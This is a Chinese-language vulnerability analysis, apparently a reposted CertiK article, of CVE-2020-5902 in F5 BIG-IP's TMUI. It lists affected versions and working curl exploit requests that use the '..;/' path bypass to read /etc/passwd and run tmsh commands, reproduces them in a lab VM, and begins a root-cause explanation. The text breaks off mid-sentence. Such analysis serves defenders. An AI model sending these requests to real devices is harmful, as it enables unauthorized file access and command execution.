狗狗币钱包设置 | CertiK：深度解析F5BIG-IP远程代码执行漏洞

前言 今日一早，推特以及各大技术论坛上炸开了锅，安全圈子的人都在讨论F5设备里远程代码执行的漏洞。很多讨论的内容，大部分是在分享如何寻找目标，利用漏洞，并没有关于对漏洞成因的分析。CertiK的安全研究员下载了存在漏洞的程序，搭建环境复现漏洞后，对漏洞的起因进行了分析，并在下文分享给大家。

背景 F5BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。Positive Technologies的研究人员Mikhail Klyuchnikov发现其配置工具Traffic Management User Interface（TMUI）中存在远程代码执行漏洞，CVE编号为CVE-2020-5902。该漏洞CVSSv3评分为10分，攻击者可利用该漏洞创建或删除文件，关闭服务、执行任意的系统命令，最终获得服务器的完全控制权。详细信息请查看参考链接1。

受影响的BIG-IP软件版本： - 【15.0.0-15.1.0.3】 - 【14.1.0-14.1.2.5】 - 【13.1.0-13.1.3.3】 - 【12.1.0-12.1.5.1】 - 【11.6.1-11.6.5.1】

漏洞利用： - 读取任意文件: curl -k "https://[F5Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" - 远程执行tmsh命令: curl -k "https://[F5Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin" 官方给出的临时修复方案(后文会对修复进行分析)：？

漏洞复现： 在F5的官网注册账号之后，可以从F5的资源库中下载存在漏洞的BIG-IP软件。访问参考链接2可以下载BIG-IP TMOS (Traffic Management Operating System, 流量管理操作系统) 的虚拟机镜像。CertiK技术团队因为使用Vmware Fusion，下载的是 "BIGIP-15.0.0-0.0.39.ALL_1SLOT-vmware.ova-ImagefilesetforVMwareESX/iServer"。

在Vmware Fusion中加载镜像(import)： 加载完成之后，使用默认用户名密码登录系统： - 用户名: root - 密码: default

系统初始化之后，使用 "ifconfig" 命令查询虚拟机IP地址。CertiK技术团队的BIG-IP TMMUI虚拟机IP地址为"172.16.4.137"。

在浏览器中访问BIG-IP TMUI登录界面： https://172.16.4.137/tmui/login.jsp

复现任意文件读取： 在浏览器中访问以下地址可以读取 "/etc/passwd" 文件内容： https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

复现tmsh命令执行： https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

漏洞分析： 在进入漏洞分析前，先要明确一点：漏洞利用中的 fileRead.jsp 和 tmshCmd.jsp 文件在用户登陆后本身是可以被访问的。

下面的截图显示了登陆前和登陆后访问以下URL的区别： https://172.16.4.137/tmui/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd 登陆前访问： - 被跳转回登陆界面 输入账号密码登陆管理界面之后再访问，可执行 fileRead.jsp 读取文件。

fileRead.jsp 和 tmshCmd.jsp 虽然是在PoC中最终被利用的文件，但是他们并不是漏洞的起因。此漏洞的本质是利用 Apache 和后台 Java (tomcat) 对URL的解析方式不同来绕过登陆限制，在未授权的情况下访问后台 JSP 模块。CertiK技术人员第一次注意到此类型漏洞是在2018年Orange的Black Hat演讲: "Breaking Parser Logic: Take Your Path Normalization Off and Pop 0-Days Out"。详细内容请查看参考链接3。

在F5 BIG-IP的后台服务器对收到的URL请求进行了两次